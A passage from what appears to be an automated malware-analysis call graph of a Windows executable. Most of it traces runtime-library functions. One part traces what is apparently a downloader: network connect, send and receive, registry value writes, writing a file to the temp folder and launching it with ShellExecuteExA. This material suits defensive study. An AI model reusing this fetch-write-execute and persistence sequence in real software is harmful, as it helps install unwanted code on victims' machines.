40e1f0 44738->44739 44740 41660c 44738->44740 44739->44730 44740->44739 44741 41629a _free 20 API calls 44740->44741 44741->44739 44743 4163a2 44742->44743 44744 41638d 44742->44744 44745 4163dd 44743->44745 44749 4163c9 44743->44749 44762 41236e 20 API calls _abort 44744->44762 44764 41236e 20 API calls _abort 44745->44764 44748 416392 44763 412381 20 API calls _abort 44748->44763 44759 416356 44749->44759 44750 4163e2 44765 412381 20 API calls _abort 44750->44765 44754 4163ea 44766 410905 26 API calls _Deallocate 44754->44766 44755 40e1fc 44755->44726 44755->44734 44757->44723 44758->44726 44767 4162d4 44759->44767 44761 41637a 44761->44755 44762->44748 44763->44755 44764->44750 44765->44754 44766->44755 44768 4162e0 BuildCatchObjectHelperInternal 44767->44768 44778 41e6fd EnterCriticalSection 44768->44778 44770 4162ee 44771 416320 44770->44771 44772 416315 44770->44772 44794 412381 20 API calls _abort 44771->44794 44779 4163fd 44772->44779 44775 41631b 44795 41634a LeaveCriticalSection __wsopen_s 44775->44795 44777 41633d std::_Xfsopen 44777->44761 44778->44770 44780 41e97a __wsopen_s 26 API calls 44779->44780 44782 41640d 44780->44782 44781 416413 44796 41e8e9 21 API calls 3 library calls 44781->44796 44782->44781 44784 416445 44782->44784 44785 41e97a __wsopen_s 26 API calls 44782->44785 44784->44781 44786 41e97a __wsopen_s 26 API calls 44784->44786 44788 41643c 44785->44788 44789 416451 FindCloseChangeNotification 44786->44789 44787 41646b 44790 41648d 44787->44790 44797 41234b 20 API calls 3 library calls 44787->44797 44791 41e97a __wsopen_s 26 API calls 44788->44791 44789->44781 44792 41645d GetLastError 44789->44792 44790->44775 44791->44784 44792->44781 44794->44775 44795->44777 44796->44787 44797->44790 44798 416ec2 44799 416ecf 44798->44799 44803 416ee7 44798->44803 44848 412381 20 API calls _abort 44799->44848 44801 416ed4 44849 410905 26 API calls _Deallocate 44801->44849 44804 416f42 44803->44804 44812 416edf 44803->44812 44850 418c55 21 API calls 2 library calls 44803->44850 44806 4154e8 _Xfiopen 26 API calls 44804->44806 44807 416f5a 44806->44807 44818 41919a 44807->44818 44809 416f61 44810 4154e8 _Xfiopen 26 API calls 44809->44810 44809->44812 44811 416f8d 44810->44811 44811->44812 44813 4154e8 _Xfiopen 26 API calls 44811->44813 44814 416f9b 44813->44814 44814->44812 44815 4154e8 _Xfiopen 26 API calls 44814->44815 44816 416fab 44815->44816 44817 4154e8 _Xfiopen 26 API calls 44816->44817 44817->44812 44819 4191a6 BuildCatchObjectHelperInternal 44818->44819 44820 4191ae 44819->44820 44823 4191c6 44819->44823 44917 41236e 20 API calls _abort 44820->44917 44822 41928c 44924 41236e 20 API calls _abort 44822->44924 44823->44822 44828 4191ff 44823->44828 44825 4191b3 44918 412381 20 API calls _abort 44825->44918 44826 419291 44925 412381 20 API calls _abort 44826->44925 44830 419223 44828->44830 44831 41920e 44828->44831 44851 41e6fd EnterCriticalSection 44830->44851 44919 41236e 20 API calls _abort 44831->44919 44833 41921b 44926 410905 26 API calls _Deallocate 44833->44926 44835 419229 44838 419245 44835->44838 44839 41925a 44835->44839 44836 419213 44920 412381 20 API calls _abort 44836->44920 44921 412381 20 API calls _abort 44838->44921 44852 4192ad 44839->44852 44841 4191bb std::_Xfsopen 44841->44809 44844 41924a 44922 41236e 20 API calls _abort 44844->44922 44845 419255 44923 419284 LeaveCriticalSection __wsopen_s 44845->44923 44848->44801 44849->44812 44850->44804 44851->44835 44853 4192d7 44852->44853 44854 4192bf 44852->44854 44856 419641 44853->44856 44861 41931c 44853->44861 44936 41236e 20 API calls _abort 44854->44936 44957 41236e 20 API calls _abort 44856->44957 44857 4192c4 44937 412381 20 API calls _abort 44857->44937 44860 419646 44958 412381 20 API calls _abort 44860->44958 44862 4192cc 44861->44862 44864 419327 44861->44864 44869 419357 44861->44869 44862->44845 44938 41236e 20 API calls _abort 44864->44938 44865 419334 44959 410905 26 API calls _Deallocate 44865->44959 44867 41932c 44939 412381 20 API calls _abort 44867->44939 44871 419370 44869->44871 44872 4193b2 44869->44872 44873 419396 44869->44873 44871->44873 44905 41937d 44871->44905 44943 417a45 44872->44943 44940 41236e 20 API calls _abort 44873->44940 44876 41939b 44941 412381 20 API calls _abort 44876->44941 44880 41629a _free 20 API calls 44883 4193d2 44880->44883 44881 41951b 44884 419591 44881->44884 44886 419534 GetConsoleMode 44881->44886 44882 4193a2 44942 410905 26 API calls _Deallocate 44882->44942 44887 41629a _free 20 API calls 44883->44887 44888 419595 ReadFile 44884->44888 44886->44884 44889 419545 44886->44889 44890 4193d9 44887->44890 44891 419609 GetLastError 44888->44891 44892 4195af 44888->44892 44889->44888 44893 41954b ReadConsoleW 44889->44893 44894 4193e3 44890->44894 44895 4193fe 44890->44895 44896 419616 44891->44896 44897 41956d 44891->44897 44892->44891 44898 419586 44892->44898 44893->44898 44900 419567 GetLastError 44893->44900 44950 412381 20 API calls _abort 44894->44950 44899 419800 _Xfiopen 28 API calls 44895->44899 44955 412381 20 API calls _abort 44896->44955 44914 4193ad __fread_nolock 44897->44914 44952 41234b 20 API calls 3 library calls 44897->44952 44909 4195d4 44898->44909 44910 4195eb 44898->44910 44898->44914 44899->44905 44900->44897 44901 41629a _free 20 API calls 44901->44862 44904 41961b 44956 41236e 20 API calls _abort 44904->44956 44927 421229 44905->44927 44907 4193e8 44951 41236e 20 API calls _abort 44907->44951 44953 418fc9 31 API calls 4 library calls 44909->44953 44913 419602 44910->44913 44910->44914 44954 418e09 29 API calls _Xfiopen 44913->44954 44914->44901 44916 419607 44916->44914 44917->44825 44918->44841 44919->44836 44920->44833 44921->44844 44922->44845 44923->44841 44924->44826 44925->44833 44926->44841 44928 421236 44927->44928 44930 421243 44927->44930 44960 412381 20 API calls _abort 44928->44960 44932 42124f 44930->44932 44961 412381 20 API calls _abort 44930->44961 44931 42123b 44931->44881 44932->44881 44934 421270 44962 410905 26 API calls _Deallocate 44934->44962 44936->44857 44937->44862 44938->44867 44939->44865 44940->44876 44941->44882 44942->44914 44944 417a83 44943->44944 44949 417a53 _unexpected 44943->44949 44964 412381 20 API calls _abort 44944->44964 44946 417a6e RtlAllocateHeap 44947 417a81 44946->44947 44946->44949 44947->44880 44949->44944 44949->44946 44963 412ede 7 API calls 2 library calls 44949->44963 44950->44907 44951->44914 44952->44914 44953->44914 44954->44916 44955->44904 44956->44914 44957->44860 44958->44865 44959->44862 44960->44931 44961->44934 44962->44931 44963->44949 44964->44947 44965 409385 44966 409391 BuildCatchObjectHelperInternal 44965->44966 44997 40959e 44966->44997 44968 409398 44969 4094eb 44968->44969 44972 4093c2 44968->44972 45098 409a73 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 44969->45098 44971 4094f2 45089 413b51 44971->45089 44985 409401 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 44972->44985 45092 413876 5 API calls CatchGuardHandler 44972->45092 44977 4093db 44979 4093e1 44977->44979 45093 41381a 5 API calls CatchGuardHandler 44977->45093 44981 409462 45008 409b8d 44981->45008 44985->44981 45094 40e677 39 API calls 4 library calls 44985->45094 44998 4095a7 44997->44998 45100 409d1b IsProcessorFeaturePresent 44998->45100 45000 4095b3 45101 40c907 10 API calls 3 library calls 45000->45101 45002 4095b8 45007 4095bc 45002->45007 45102 415329 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45002->45102 45004 4095d3 45004->44968 45005 4095c5 45005->45004 45103 40c930 8 API calls 3 library calls 45005->45103 45007->44968 45104 40b5a0 45008->45104 45010 409ba0 GetStartupInfoW 45011 409468 45010->45011 45012 4137c7 45011->45012 45106 41e1c1 45012->45106 45014 4137d0 45016 409471 45014->45016 45110 41e4cb 38 API calls 45014->45110 45017 424b3e 45016->45017 45018 424b4e _Xfiopen 45017->45018 45112 401b1e 45018->45112 45020 424b7c 45115 403498 45020->45115 45025 401b1e 27 API calls 45026 424bdc 45025->45026 45122 426354 45026->45122 45029 401b1e 27 API calls 45030 424bf5 GetModuleFileNameA 45029->45030 45031 401b1e 27 API calls 45030->45031 45032 424c1f 45031->45032 45142 425ee2 45032->45142 45034 424c2f 45035 401b1e 27 API calls 45034->45035 45036 4250ca 45035->45036 45161 4034e3 45036->45161 45038 4250f4 45169 426504 45038->45169 45040 425233 45232 42612f 45040->45232 45042 4253f6 45043 401b1e 27 API calls 45042->45043 45044 4255c2 45043->45044 45246 40356f 45044->45246 45046 4255df 45047 426504 63 API calls 45046->45047 45048 425666 45047->45048 45049 426504 63 API calls 45048->45049 45052 425840 ___scrt_fastfail 45049->45052 45050 425e40 45275 4019f8 26 API calls 45050->45275 45052->45050 45254 410c91 45052->45254 45056 42586d 45262 426217 CreateFileA 45056->45262 45061 401b1e 27 API calls 45062 4258a7 45061->45062 45265 426260 45062->45265 45065 4258ac 45066 426504 63 API calls 45065->45066 45067 425ac4 ___scrt_fastfail 45066->45067 45075 425bbf 45067->45075 45272 42631a GetTempPathA 45067->45272 45070 426217 3 API calls 45071 425ba3 45070->45071 45072 401b1e 27 API calls 45071->45072 45071->45075 45073 425bba 45072->45073 45074 426260 29 API calls 45073->45074 45074->45075 45076 426504 63 API calls 45075->45076 45078 425db5 ___scrt_fastfail 45076->45078 45080 410c91 51 API calls 45078->45080 45085 425e1b 45078->45085 45082 425ddf 45080->45082 45083 426217 3 API calls 45082->45083 45084 425dfd 45083->45084 45084->45085 45086 401b1e 27 API calls 45084->45086 45274 4019f8 26 API calls 45085->45274 45087 425e16 45086->45087 45088 426260 29 API calls 45087->45088 45088->45085 45726 4138ce 45089->45726 45092->44977 45093->44985 45094->44981 45098->44971 45100->45000 45101->45002 45102->45005 45103->45007 45105 40b5b7 45104->45105 45105->45010 45105->45105 45107 41e1ca 45106->45107 45108 41e1d3 45106->45108 45111 41e0c0 51 API calls 5 library calls 45107->45111 45108->45014 45110->45014 45111->45108 45276 402c50 45112->45276 45116 4034c0 45115->45116 45117 4034d9 45115->45117 45116->45117 45285 40e509 46 API calls 45116->45285 45119 401b52 45117->45119 45286 402d13 45119->45286 45121 401b68 45121->45025 45123 42635e __EH_prolog 45122->45123 45317 403e0c 45123->45317 45125 426382 45126 402c71 27 API calls 45125->45126 45127 4263e7 45126->45127 45331 404097 45127->45331 45129 426496 45133 4264b2 std::ios_base::_Ios_base_dtor 45129->45133 45348 40387f 26 API calls 2 library calls 45129->45348 45132 42646e 45135 402c50 27 API calls 45132->45135 45344 402bef 45133->45344 45138 42648e 45135->45138 45136 402c71 27 API calls 45136->45132 45140 402bef 26 API calls 45138->45140 45139 402bef 26 API calls 45141 424be8 45139->45141 45140->45129 45141->45029 45143 425eec __EH_prolog 45142->45143 45478 401bb2 45143->45478 45148 425f4b 45494 401a16 45148->45494 45149 425f2f 45515 401b6f 45149->45515 45152 425f58 45497 4024a1 45152->45497 45155 425f42 std::ios_base::_Ios_base_dtor 45155->45034 45159 425fa6 45160 401b6f 68 API calls 45159->45160 45160->45155 45162 4034ed __EH_prolog 45161->45162 45666 401056 45162->45666 45164 403513 45165 401056 50 API calls 45164->45165 45166 403542 45165->45166 45670 40399f 45166->45670 45168 403553 45168->45038 45170 42650e __EH_prolog 45169->45170 45171 401b1e 27 API calls 45170->45171 45172 4268d7 45171->45172 45708 401aa1 45172->45708 45174 4268ed 45175 401aa1 27 API calls 45174->45175 45176 426974 45175->45176 45177 401aa1 27 API calls 45176->45177 45178 426981 45177->45178 45179 401aa1 27 API calls 45178->45179 45180 4269e4 45179->45180 45181 401aa1 27 API calls 45180->45181 45182 4269f5 45181->45182 45183 401aa1 27 API calls 45182->45183 45184 426a02 45183->45184 45185 401aa1 27 API calls 45184->45185 45186 426aad 45185->45186 45187 401aa1 27 API calls 45186->45187 45188 426da4 45187->45188 45189 401aa1 27 API calls 45188->45189 45190 427053 45189->45190 45191 401aa1 27 API calls 45190->45191 45216 427060 45191->45216 45192 42717c 45193 401aa1 27 API calls 45192->45193 45194 427189 WSAStartup 45193->45194 45195 4271a3 socket 45194->45195 45217 4273da 45194->45217 45196 4271d0 45195->45196 45197 4271bb 45195->45197 45199 4271d8 gethostbyname 45196->45199 45198 4271c4 WSACleanup 45197->45198 45202 42758b 45198->45202 45200 4271e9 ctype 45199->45200 45199->45217 45203 4271fc htons connect 45200->45203 45201 42757e WSACleanup closesocket 45201->45202 45202->45040 45204 42722b 45203->45204 45203->45217 45205 42723d send 45204->45205 45206 42724d 45205->45206 45205->45217 45207 427253 send 45206->45207 45212 427269 ___scrt_fastfail 45206->45212 45207->45212 45207->45217 45208 42728f recv 45208->45212 45208->45217 45209 4273cd 45210 4273d4 45209->45210 45211 427515 45209->45211 45230 4273e9 45209->45230 45210->45217 45210->45230 45214 427535 recv 45211->45214 45211->45217 45212->45208 45212->45209 45212->45217 45220 412faf 46 API calls 45212->45220 45714 41196d 42 API calls std::_Locinfo::_Locinfo_ctor 45212->45714 45213 42740d recv 45213->45217 45213->45230 45214->45211 45214->45217 45216->45192 45219 401aa1 27 API calls 45216->45219 45217->45201 45218 427508 45218->45217 45221 42714c 45219->45221 45220->45212 45712 403ae1 27 API calls 45221->45712 45224 427157 45713 401ac2 27 API calls 45224->45713 45226 427164 45228 401aa1 27 API calls 45226->45228 45227 4274aa recv 45227->45217 45227->45230 45228->45192 45230->45213 45230->45217 45230->45218 45230->45227 45231 4274d5 recv 45230->45231 45715 41196d 42 API calls std::_Locinfo::_Locinfo_ctor 45230->45715 45716 42611d 22 API calls 45230->45716 45231->45217 45231->45230 45722 4275a4 45232->45722 45234 426139 RegCreateKeyExA 45235 4261f7 45234->45235 45236 42616c 45234->45236 45237 426206 45235->45237 45238 4261fd RegCloseKey 45235->45238 45239 402c71 27 API calls 45236->45239 45237->45042 45238->45237 45240 426195 45239->45240 45241 402c71 27 API calls 45240->45241 45242 4261be RegSetValueExA 45241->45242 45243 402bef 26 API calls 45242->45243 45244 4261ef 45243->45244 45245 402bef 26 API calls 45244->45245 45245->45235 45247 403579 __EH_prolog 45246->45247 45248 401056 50 API calls 45247->45248 45249 40359c 45248->45249 45250 401056 50 API calls 45249->45250 45251 4035c8 45250->45251 45252 40399f 27 API calls 45251->45252 45253 4035d9 45252->45253 45253->45046 45255 410cb2 45254->45255 45256 410c9d 45254->45256 45725 41097b 51 API calls 5 library calls 45255->45725 45723 412381 20 API calls _abort 45256->45723 45259 410ca2 45724 410905 26 API calls _Deallocate 45259->45724 45260 410cad 45260->45056 45263 42588e 45262->45263 45264 42623e WriteFile FindCloseChangeNotification 45262->45264 45263->45061 45263->45065 45264->45263 45266 426271 45265->45266 45266->45266 45267 426279 ShellExecuteExA 45266->45267 45268 4262c5 45267->45268 45269 4262ae WaitForSingleObject CloseHandle 45267->45269 45270 402bef 26 API calls 45268->45270 45269->45268 45271 4262cd 45270->45271 45271->45065 45273 425b8e 45272->45273 45273->45070 45277 402c5a 45276->45277 45277->45277 45280 402c71 45277->45280 45279 401b3a 45279->45020 45281 402ca4 45280->45281 45283 402c80 BuildCatchObjectHelperInternal 45280->45283 45284 40373e 27 API calls 2 library calls 45281->45284 45283->45279 45284->45283 45285->45116 45287 402d2a 45286->45287 45289 402d31 ctype 45287->45289 45290 403859 45287->45290 45289->45121 45291 403866 45290->45291 45292 40386f 45290->45292 45297 4039ce 45291->45297 45294 40387b 45292->45294 45306 409256 45292->45306 45294->45289 45295 40386c 45295->45289 45298 409256 std::_Facet_Register 8 API calls 45297->45298 45299 4039e5 45298->45299 45300 4039f7 45299->45300 45301 4039ec 45299->45301 45313 41088a 26 API calls 4 library calls 45300->45313 45301->45295 45303 410924 45314 410932 11 API calls _abort 45303->45314 45305 410931 45308 40925b _Yarn 45306->45308 45307 409275 45307->45295 45308->45307 45310 409277 std::_Facet_Register 45308->45310 45315 412ede 7 API calls 2 library calls 45308->45315 45316 40aa2b RaiseException 45310->45316 45312 40996c 45313->45303 45314->45305 45315->45308 45316->45312 45318 403e16 __EH_prolog 45317->45318 45349 407d73 45318->45349 45320 403e38 45359 404189 45320->45359 45326 403e7f 45397 4044e5 45326->45397 45328 403e8b 45418 4043fe 45328->45418 45332 4040a1 __EH_prolog 45331->45332 45333 4040b2 45332->45333 45471 40429b 27 API calls __EH_prolog 45332->45471 45333->45129 45333->45132 45333->45136 45335 4040d9 45472 404777 27 API calls 45335->45472 45337 404152 45476 404238 26 API calls _Deallocate 45337->45476 45340 4040e9 45340->45337 45341 404144 45340->45341 45473 404777 27 API calls 45340->45473 45474 404579 26 API calls 45340->45474 45475 404777 27 API calls 45341->45475 45345 402c03 45344->45345 45346 402bfa 45344->45346 45345->45139 45477 40387f 26 API calls 2 library calls 45346->45477 45348->45133 45350 407d7f __EH_prolog3 45349->45350 45422 407b1c 45350->45422 45355 407d9d 45436 407f02 40 API calls _Atexit 45355->45436 45356 407dfb std::locale::_Init 45356->45320 45358 407da5 _Yarn 45428 407b74 45358->45428 45360 404193 __EH_prolog 45359->45360 45361 407b1c std::_Lockit::_Lockit 2 API calls 45360->45361 45362 4041a2 45361->45362 45441 401318 45362->45441 45364 4041cc 45366 407b74 std::_Lockit::~_Lockit 2 API calls 45364->45366 45365 4041b9 std::locale::_Getfacet 45365->45364 45447 40436e 76 API calls 3 library calls 45365->45447 45368 403e49 45366->45368 45375 4033ea 45368->45375 45369 4041dc 45370 4041e3 45369->45370 45371 404219 45369->45371 45448 407d41 8 API calls std::_Facet_Register 45370->45448 45449 40aa2b RaiseException 45371->45449 45374 40422f 45376 4033f4 __EH_prolog 45375->45376 45377 407b1c std::_Lockit::_Lockit 2 API calls 45376->45377 45378 403403 45377->45378 45379 401318 int 4 API calls 45378->45379 45381 40341a std::locale::_Getfacet 45379->45381 45380 40342d 45382 407b74 std::_Lockit::~_Lockit 2 API calls 45380->45382 45381->45380 45450 401429 76 API calls 2 library calls 45381->45450 45383 40346a 45382->45383 45391 404424 45383->45391 45385 40343d 45386 403444 45385->45386 45387 40347a 45385->45387 45451 407d41 8 API calls std::_Facet_Register 45386->45451 45452 40aa2b RaiseException 45387->45452 45390 403490 45392 40442e __EH_prolog 45391->45392 45453 404d6b 45392->45453 45394 404463 45395 409256 std::_Facet_Register 8 API calls 45394->45395 45396 40447e 45395->45396 45396->45326 45398 4044ef __EH_prolog 45397->45398 45465 405177 8 API calls std::_Facet_Register 45398->45465 45400 40450d 45466 405025 29 API calls std::_Facet_Register 45400->45466 45402 404517 45403 404571 45402->45403 45404 40451e 45402->45404 45469 404efe 27 API calls 45403->45469 45467 405119 8 API calls std::_Facet_Register 45404->45467 45407 404528 45468 405e85 8 API calls std::_Facet_Register 45407->45468 45409 404531 45409->45328 45419 403eb8 45418->45419 45420 404406 45418->45420 45419->45125 45470 40387f 26 API calls 2 library calls 45420->45470 45423 407b32 45422->45423 45424 407b2b 45422->45424 45426 407b30 45423->45426 45438 408745 EnterCriticalSection 45423->45438 45437 411a65 EnterCriticalSection std::_Lockit::_Lockit 45424->45437 45426->45358 45435 407edf 8 API calls 2 library calls 45426->45435 45429 407b7e 45428->45429 45430 411a6e 45428->45430 45434 407b91 45429->45434 45439 408753 LeaveCriticalSection 45429->45439 45440 411a4e LeaveCriticalSection 45430->45440 45433 411a75 45433->45356 45434->45356 45435->45355 45436->45358 45437->45426 45438->45426 45439->45434 45440->45433 45442 401324 45441->45442 45443 401348 45441->45443 45444 407b1c std::_Lockit::_Lockit 2 API calls 45442->45444 45443->45365 45445 40132e 45444->45445 45446 407b74 std::_Lockit::~_Lockit 2 API calls 45445->45446 45446->45443 45447->45369 45448->45364 45449->45374 45450->45385 45451->45380 45452->45390 45456 404eb6 45453->45456 45455 404d85 45455->45394 45455->45455 45457 404ed2 45456->45457 45458 404ece 45456->45458 45459 404ef8 45457->45459 45460 404eda 45457->45460 45458->45455 45464 4030f6 27 API calls 45459->45464 45461 403859 27 API calls 45460->45461 45461->45458 45465->45400 45466->45402 45467->45407 45468->45409 45470->45419 45471->45335 45472->45340 45473->45340 45474->45340 45475->45337 45477->45345 45479 401bbc __EH_prolog 45478->45479 45519 40307c 45479->45519 45485 401c1f 45486 401c51 45485->45486 45537 40187f 43 API calls 2 library calls 45485->45537 45488 402403 45486->45488 45489 40240d __EH_prolog 45488->45489 45555 402b06 45489->45555 45492 402441 45492->45148 45492->45149 45601 402baa 45494->45601 45496 401a30 ___scrt_fastfail 45496->45152 45498 4024ab __EH_prolog 45497->45498 45499 4024e4 45498->45499 45610 40187f 43 API calls 2 library calls 45498->45610 45501 402b06 43 API calls 45499->45501 45502 4024ee 45501->45502 45503 402551 45502->45503 45506 401d87 65 API calls 45502->45506 45507 40257c 45503->45507 45504 402511 45504->45503 45611 40187f 43 API calls 2 library calls 45504->45611 45506->45504 45508 402586 __EH_prolog 45507->45508 45509 402b06 43 API calls 45508->45509 45512 4025a8 45509->45512 45510 40265a 45518 402b87 26 API calls _Deallocate 45510->45518 45513 4025d8 45512->45513 45612 401f2b 45512->45612 45513->45510 45616 40187f 43 API calls 2 library calls 45513->45616 45654 4023b6 45515->45654 45517 401b95 45517->45155 45518->45159 45520 403086 __EH_prolog 45519->45520 45538 403175 45520->45538 45523 402fe5 45524 402fef __EH_prolog 45523->45524 45525 409256 std::_Facet_Register 8 API calls 45524->45525 45526 403005 45525->45526 45527 407d73 std::locale::_Init 43 API calls 45526->45527 45528 403013 45527->45528 45549 402e7b 45528->45549 45531 402f6b 45533 402f75 __EH_prolog 45531->45533 45532 402fbf std::ios_base::_Ios_base_dtor 45532->45485 45533->45532 45534 402e7b 26 API calls 45533->45534 45535 402f9d 45534->45535 45554 4035f5 76 API calls 7 library calls 45535->45554 45537->45486 45539 40317f __EH_prolog 45538->45539 45540 409256 std::_Facet_Register 8 API calls 45539->45540 45541 4031b9 45540->45541 45542 407d73 std::locale::_Init 43 API calls 45541->45542 45543 4031c6 45542->45543 45544 4033ea 76 API calls 45543->45544 45545 4031f5 std::ios_base::_Ios_base_dtor 45544->45545 45546 401bec 45545->45546 45548 40187f 43 API calls 2 library calls 45545->45548 45546->45523 45548->45546 45550 401c0f 45549->45550 45551 402ed9 45549->45551 45550->45531 45553 40e7d7 26 API calls 2 library calls 45551->45553 45553->45550 45554->45532 45556 402b10 __EH_prolog 45555->45556 45567 403101 45556->45567 45559 401d87 45560 401d99 45559->45560 45566 401df4 45560->45566 45575 402dfd 45560->45575 45563 401de1 45563->45566 45584 40fd67 45563->45584 45566->45492 45570 40310b __EH_prolog 45567->45570 45568 403128 45569 40241d 45568->45569 45574 40187f 43 API calls 2 library calls 45568->45574 45569->45492 45569->45559 45570->45568 45573 403242 43 API calls __EH_prolog 45570->45573 45573->45568 45574->45569 45576 402e0d 45575->45576 45579 401dc4 45575->45579 45576->45579 45595 4022ae 65 API calls 45576->45595 45578 402e1a 45578->45579 45596 40ea7d 65 API calls 2 library calls 45578->45596 45579->45563 45579->45566 45581 4106d4 45579->45581 45582 41049b _Xfiopen 64 API calls 45581->45582 45583 4106ea 45582->45583 45583->45563 45585 40fd72 45584->45585 45587 40fd87 45584->45587 45597 412381 20 API calls _abort 45585->45597 45594 40fd9f 45587->45594 45599 412381 20 API calls _abort 45587->45599 45588 40fd77 45598 410905 26 API calls _Deallocate 45588->45598 45591 40fd94 45600 410905 26 API calls _Deallocate 45591->45600 45592 40fd82 45592->45566 45594->45566 45595->45578 45596->45579 45597->45588 45598->45592 45599->45591 45600->45594 45602 402bc2 45601->45602 45603 402bc6 45601->45603 45602->45496 45604 402be9 45603->45604 45605 402bce 45603->45605 45609 4030f6 27 API calls 45604->45609 45606 403859 27 API calls 45605->45606 45606->45602 45610->45499 45611->45503 45613 401f3f 45612->45613 45614 401f52 ctype 45612->45614 45613->45513 45614->45613 45617 4102e9 45614->45617 45616->45510 45620 410306 45617->45620 45619 410301 45619->45613 45621 410312 BuildCatchObjectHelperInternal 45620->45621 45622 410352 45621->45622 45623 41034a std::_Xfsopen 45621->45623 45625 410325 ___scrt_fastfail 45621->45625 45633 40e81d EnterCriticalSection 45622->45633 45623->45619 45647 412381 20 API calls _abort 45625->45647 45626 41035c 45634 41011d 45626->45634 45629 41033f 45648 410905 26 API calls _Deallocate 45629->45648 45633->45626 45636 41012f ___scrt_fastfail 45634->45636 45640 41014c 45634->45640 45635 41013c 45650 412381 20 API calls _abort 45635->45650 45636->45635 45636->45640 45642 41018f __fread_nolock 45636->45642 45638 410141 45651 410905 26 API calls _Deallocate 45638->45651 45649 410391 LeaveCriticalSection __fread_nolock 45640->45649 45641 4102ab ___scrt_fastfail 45653 412381 20 API calls _abort 45641->45653 45642->45640 45642->45641 45644 4154e8 _Xfiopen 26 API calls 45642->45644 45646 4192ad __fread_nolock 38 API calls 45642->45646 45652 410399 26 API calls 4 library calls 45642->45652 45644->45642 45646->45642 45647->45629 45648->45623 45649->45623 45650->45638 45651->45640 45652->45642 45653->45638 45655 4023dd 45654->45655 45657 4023ef 45655->45657 45658 402f2f 45655->45658 45657->45517 45659 402f3d 45658->45659 45665 402f39 45658->45665 45660 402dfd 65 API calls 45659->45660 45661 402f42 45660->45661 45663 40e228 _Xfiopen 67 API calls 45661->45663 45662 402e7b 26 API calls 45664 402f66 45662->45664 45663->45665 45664->45657 45665->45662 45667 40106d ___scrt_initialize_default_local_stdio_options 45666->45667 45674 40fd43 45667->45674 45671 4039c7 45670->45671 45672 4039bb 45670->45672 45671->45168 45673 402c71 27 API calls 45672->45673 45673->45671 45677 40ead5 45674->45677 45678 40eb15 45677->45678 45679 40eafd 45677->45679 45678->45679 45681 40eb1d 45678->45681 45701 412381 20 API calls _abort 45679->45701 45703 40e3f2 38 API calls 3 library calls 45681->45703 45682 40eb02 45702 410905 26 API calls _Deallocate 45682->45702 45685 40eb2d 45704 40eef9 20 API calls __Strcoll 45685->45704 45688 40eba5 45705 40f0ad 50 API calls 3 library calls 45688->45705 45689 40107b 45689->45164 45692 40eb0d 45694 4097a5 45692->45694 45693 40ebb0 45706 40ef2e 20 API calls _free 45693->45706 45695 4097b0 IsProcessorFeaturePresent 45694->45695 45696 4097ae 45694->45696 45698 409efa 45695->45698 45696->45689 45707 409ebe SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45698->45707 45700 409fdd 45700->45689 45701->45682 45702->45692 45703->45685 45704->45688 45705->45693 45706->45692 45707->45700 45709 401aab 45708->45709 45709->45709 45717 402cba 45709->45717 45711 401abd 45711->45174 45712->45224 45713->45226 45714->45212 45715->45230 45716->45230 45718 402cfa 45717->45718 45720 402cd0 BuildCatchObjectHelperInternal 45717->45720 45721 4037a9 27 API calls 2 library calls 45718->45721 45720->45711 45721->45720 45722->45234 45723->45259 45724->45260 45725->45260 45727 4138da _abort 45726->45727 45728 4138e1 45727->45728 45729 4138f3 45727->45729 45762 413a28 GetModuleHandleW 45728->45762 45750 411a06 EnterCriticalSection 45729->45750 45732 4138e6 45732->45729 45763 413a6c GetModuleHandleExW 45732->45763 45735 41396f 45747 413987 45735->45747 45772 41381a 5 API calls CatchGuardHandler 45735->45772 45738 4139e1 45774 424699 5 API calls CatchGuardHandler 45738->45774 45739 4139b5 45754 4139e7 45739->45754 45745 4138fa 45745->45735 45748 413998 45745->45748 45771 4151ba 20 API calls _abort 45745->45771 45773 41381a 5 API calls CatchGuardHandler 45747->45773 45751 4139d8 45748->45751 45750->45745 45775 411a4e LeaveCriticalSection 45751->45775 45753 4139b1 45753->45738 45753->45739 45776 4177fa 45754->45776 45757 413a15 45759 413a6c _abort 8 API calls 45757->45759 45758 4139f5 GetPEB 45758->45757 45760 413a05 GetCurrentProcess TerminateProcess 45758->45760 45761 413a1d ExitProcess 45759->45761 45760->45757 45762->45732 45764 413a96 GetProcAddress 45763->45764 45765 413ab9 45763->45765 45770 413aab 45764->45770 45766 413ac8 45765->45766 45767 413abf FreeLibrary 45765->45767 45768 4097a5 CatchGuardHandler 5 API calls 45766->45768 45767->45766 45769 4138f2 45768->45769 45769->45729 45770->45765 45771->45735 45772->45747 45773->45748 45775->45753 45777 41781f 45776->45777 45778 417815 45776->45778 45783 4171b7 5 API calls 2 library calls 45777->45783 45780 4097a5 CatchGuardHandler 5 API calls 45778->45780 45781 4139f1 45780->45781 45781->45757 45781->45758 45782 417836 45782->45778 45783->45782 45784 41aff9 45789 41adc7 45784->45789 45787 41b021 45794 41adf2 45789->45794 45791 41afe5 45808 410905 26 API calls _Deallocate 45791->45808 45793 41af44 45793->45787 45801 41a34b 45793->45801 45797 41af3b 45794->45797 45804 422ce9 46 API calls 2 library calls 45794->45804 45796 41af85 45796->45797 45805 422ce9 46 API calls 2 library calls 45796->45805 45797->45793 45807 412381 20 API calls _abort 45797->45807 45799 41afa4 45799->45797 45806 422ce9 46 API calls 2 library calls 45799->45806 45809 419d20 45801->45809 45803 41a366 45803->45787 45804->45796 45805->45799 45806->45797 45807->45791 45808->45793 45811 419d2c BuildCatchObjectHelperInternal 45809->45811 45810 419d3a 45827 412381 20 API calls _abort 45810->45827 45811->45810 45814 419d73 45811->45814 45813 419d3f 45828 410905 26 API calls _Deallocate 45813->45828 45820 41a2fa 45814->45820 45819 419d49 std::_Xfsopen 45819->45803 45830 4228d8 45820->45830 45822 419d97 45829 419dc0 LeaveCriticalSection __wsopen_s 45822->45829 45826 41629a _free 20 API calls 45826->45822 45827->45813 45828->45819 45829->45819 45831 4228e4 45830->45831 45832 4228fb 45830->45832 45901 412381 20 API calls _abort 45831->45901 45834 422903 45832->45834 45835 42291a 45832->45835 45903 412381 20 API calls _abort 45834->45903 45905 4172ce 10 API calls 2 library calls 45835->45905 45838 4228e9 45902 410905 26 API calls _Deallocate 45838->45902 45839 422908 45904 410905 26 API calls _Deallocate 45839->45904 45840 422921 MultiByteToWideChar 45843 